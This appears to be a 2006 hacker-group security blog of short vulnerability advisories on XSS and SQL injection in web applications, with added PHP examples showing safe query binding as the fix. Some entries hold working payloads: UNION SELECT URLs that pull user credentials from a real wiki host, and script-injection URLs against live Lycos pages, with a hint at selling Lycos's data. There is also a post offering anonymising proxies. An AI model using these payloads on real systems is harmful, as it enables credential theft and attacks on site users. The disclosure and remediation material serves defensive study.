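What "properly sanitised" means for the two OBM issues above, as an added example that is not OBM source code: the sort parameters "new_order" and "order_dir" end up as SQL identifiers and keywords, which cannot be bound as statement parameters and so have to be mapped onto fixed lists, while "tf_name" is bound as a value and HTML-encoded when echoed back. The "grp" table, its columns and the function names are assumptions made for the illustration.

```php
<?php
// Added example, not OBM source code. The "grp" table and its columns are
// assumptions modelled on the parameter values visible in the advisory URLs.

// Request value => SQL identifier. Only these columns may be sorted on.
const SORTABLE = [
    'group_name'  => 'group_name',
    'group_email' => 'group_email',
];

// Read one query-string value as a string; arrays (?x[]=1) become ''.
function strParam(array $query, string $key): string
{
    $value = $query[$key] ?? '';
    return is_string($value) ? $value : '';
}

// Identifiers and keywords cannot be bound as statement parameters, so
// "new_order" and "order_dir" are mapped onto fixed lists with a default.
function orderClause(array $query): string
{
    $col = SORTABLE[strParam($query, 'new_order')] ?? 'group_name';
    $dir = strtoupper(strParam($query, 'order_dir'));
    if (!in_array($dir, ['ASC', 'DESC'], true)) {
        $dir = 'ASC';
    }
    return "ORDER BY $col $dir";
}

// The search term is a value, so it is bound and never concatenated.
function searchGroups(PDO $db, array $query): array
{
    $sql = 'SELECT group_name, group_email FROM grp '
         . 'WHERE group_name LIKE :name ' . orderClause($query);
    $stmt = $db->prepare($sql);
    $stmt->execute([':name' => '%' . strParam($query, 'tf_name') . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Echo the search term back into the form, encoded for an HTML attribute.
function renderSearchForm(array $query): string
{
    $name = htmlspecialchars(
        strParam($query, 'tf_name'),
        ENT_QUOTES | ENT_SUBSTITUTE,
        'UTF-8'
    );
    return '<input type="text" name="tf_name" value="' . $name . '">';
}

// Constructed data and constructed requests for the demonstration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE grp (group_name TEXT, group_email TEXT)');
$db->exec("INSERT INTO grp VALUES ('admins', 'b@example.org')");
$db->exec("INSERT INTO grp VALUES ('staff', 'a@example.org')");

$requests = [
    ['tf_name' => '', 'new_order' => 'group_email', 'order_dir' => 'desc'],
    ['tf_name' => '', 'new_order' => 'group_email, (SELECT 1)', 'order_dir' => 'DESC, 1'],
    ['tf_name' => '"><b>x</b>', 'new_order' => ['x'], 'order_dir' => ''],
];
foreach ($requests as $q) {
    echo orderClause($q), ' | ', count(searchGroups($db, $q)), ' row(s) | ',
         renderSearchForm($q), "\n";
}
```

The second and third requests fall back to the default sort instead of reaching the query, and the markup in the third is emitted as text inside the attribute rather than as HTML.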

KnowledgeTree Open Source XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 6 june 2006
vendor:www.ktdms.com/products/knowledgetree
affected versions:3.0.3 and prior
###############################################

Vuln. Description:

KnowledgeTree contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "fDocumentId" parameter in "view.php" and input passed to the "fSearchableText" parameter in "/search/simpleSearch.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

An attacker will also get the full installation path from the error message returned while testing the "fDocumentId" parameter in "view.php".


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SquirrelMail <=1.5.1 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 6 june 2006
vendor:http://www.squirrelmail.org/
affected versions:
1.4.6-20060409 latest stable
1.4.7[CVS]
1.5.1-20060409 Development Version
and prior versions also can be affected
###############################################

Vuln. Description:

SquirrelMail contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "mailbox" parameter in "search.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, June 05, 2006

LabWiki XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 5 june 2006
vendor:www.bioinformatics.org/phplabware/labwiki/
affected versions:1.0 and prior
###############################################

Vuln. Description:

LabWiki contains a flaw that allows remote Cross-Site Scripting attacks. Input passed to the "help" parameter in "recentchanges.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Particle Wiki SQL inj.

###############################################
Vuln. discovered by : r0t
Date: 5 june 2006
vendor:www.particlesoft.net/particlewiki/
affected versions:1.0.2 and prior
###############################################

Vuln. Description:

Particle Wiki contains a flaw that allows remote SQL injection attacks. Input passed to the "version" parameter in "index.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

POC:

# Exploited by FarhadKey from http://www.kapda.ir

Username :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select
%201,1,1,1,1,username%20from%20pwiki_users%20/*
Password :
http://wiki.particlesoft.net/index.php?version=-1%20union%20select
%201,1,1,1,1,password%20from%20pwiki_users%20/*

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Particle Gallery SQL inj.

###############################################
Vuln. discovered by : r0t
Date: 5 june 2006
vendor:www.particlesoft.net/particlegallery/
affected versions:1.0.0 and prior
###############################################

Vuln. Description:

Particle Gallery contains a flaw that allows remote SQL injection attacks. Input passed to the "imageid" parameter in "viewimage.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Vendor patch:
Update to 1.0.1
or
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/
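
For numeric parameters such as "version" in Particle Wiki's "index.php" and "imageid" in Particle Gallery's "viewimage.php", the fix has two layers, shown here as an added example that is not Particle source code: reject anything that is not a plain integer, and bind the value so it cannot change the shape of the statement. The "pwiki_pages" table, its columns and the function names are assumptions; "pwiki_users" is the table named in the POC above.

```php
<?php
// Added example, not Particle Wiki source code. The "pwiki_pages" table and
// its columns are assumptions; "pwiki_users" is the table named in the POC.

// Accept only a plain non-negative decimal integer; anything else is null.
function intParam(array $query, string $key): ?int
{
    $raw = $query[$key] ?? null;
    if (!is_string($raw)) {
        return null;
    }
    $n = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    return $n === false ? null : $n;
}

// Layer 1: reject non-numeric input before it reaches the database.
// Layer 2: bind the value, so it can never change the statement's shape.
function loadRevision(PDO $db, array $query): ?array
{
    $version = intParam($query, 'version');
    if ($version === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, title FROM pwiki_pages WHERE id = :v');
    $stmt->bindValue(':v', $version, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Binding alone, without validation: the whole string is compared as one
// value, so the query still reads pwiki_pages only and matches nothing here.
function loadRevisionBoundOnly(PDO $db, string $raw): array
{
    $stmt = $db->prepare('SELECT id, title FROM pwiki_pages WHERE id = :v');
    $stmt->execute([':v' => $raw]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed data for the demonstration.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE pwiki_pages (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec('CREATE TABLE pwiki_users (username TEXT, password TEXT)');
$db->exec("INSERT INTO pwiki_pages VALUES (1, 'Home')");
$db->exec("INSERT INTO pwiki_users VALUES ('admin', 'constructed-hash')");

// The second value is the advisory's POC string after URL decoding.
$poc = '-1 union select 1,1,1,1,1,username from pwiki_users /*';
foreach (['1', $poc, '0x1', '999'] as $raw) {
    $row = loadRevision($db, ['version' => $raw]);
    printf("%-60s => %s\n", json_encode($raw), json_encode($row));
}
printf("bound only: %d row(s)\n", count(loadRevisionBoundOnly($db, $poc)));
```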

Friday, June 02, 2006

Socks&Proxies 4 today

As always, all proxies are without logging* feature :) and the proxies are https, but the socks are 4/5. Thanks to ~d4rk*byt3~


Vulnerabilities and Public +personal...

In a few months I have posted/reported some harmful* vulnerabilities, but I think it is enough for me.
My friend der4444 wrote some time ago that public exploits s*ck; in my case there were no public exploits or any how-to* for those guys who call themselves "hackers".
I will post/report a maximum of 10-15 more, and that will be the end.
Of course not for us, not for you... just for me.
I think that VietMafia will continue sharing part of his job and time in public.
In my case, if before I had a few minutes at school to check & report some security holes, now my free time is over.
I even tried to manage my time for my small hobby... but... but... oh yeah, summer is in Europe too :) So maybe I will continue with my reports in autumn, I hope so.

And of course in summer I will not have enough time to learn English; that means those who had & have problems with my English writing style/grammar will have the same problems in future too. For my native language you will not find any translator which will work with my style*, so I think I will continue typing in something similar to English.

About the blog and forum: they will exist as always.

Even though the end will come soon... I'm still r0t.

Unak CMS vuln.

###############################################
Vuln. discovered by : r0t
Date: 2 june 2006
vendor:http://www.unak.net
affected versions:1.5 RC2 and prior
###############################################

Vuln. Description:


1) Input passed to the "u_a" and "u_s" parameters is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

2) Input to the "u_a" and "u_s" parameters is also not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Thursday, June 01, 2006

Lore <=1.5.6 SQL injection vuln.

###############################################
Vuln. discovered by : r0t
Date: 1 june 2006
vendor:http://www.pineappletechnologies.com/products/lore/
affected versions:1.5.6 and prior
###############################################

Vuln. Description:

Lore contains a flaw that allows remote SQL injection attacks. Input passed to the "article_id" parameter in "comment.php" isn't properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Status:
reported to vendor
###############################################
More information @ unsecured-systems.com/forum/

mchsi.com + att.net XSS&Full path disclosure

As always nothin' special, similar stuff to Lycos.

http://ackley.mediacomtoday.com/community/news/
video/index.php?id=0531dvs_dozier_ER&ds=Full Path :)

http://communities.att.net/pe/action/profile
/resetpassword?returnUrl=[XSS]

XSS in Lycos.com

Here will be some examples:

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=
6&m_PR=2&m_CBURL=%22%3Cscript%3Ealert('r0t')%3C/script%3E

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=6&m_PR
=2&m_CBURL=http%3A%2F%2Fpridels.blogspot.com%2F&m_CBERRURL
=%22%3Cscript%3Ealert('r0t')%3C/script%3E

https://ldbreg.lycos.com/cgi-bin/mayaRegister?m_RC=6&m_PR=2
&m_CBURL=http%3A%2F%2Fpridels.blogspot.com%2F&m_CBERRURL=ht
tp%3A%2F%2Fpridels.blogspot.com%2F&m_LANG=1&Z=1149121877&m_
AL=2&m_DL_FREE=%22%3Cscript%3Ealert('r0t')%3C/script%3E



P.S. Lycos contains a lot more XSS and other vulns.
I don't know how much the db from Lycos can cost :)

 
Copyright (c) 2006 Pridels Sec Crew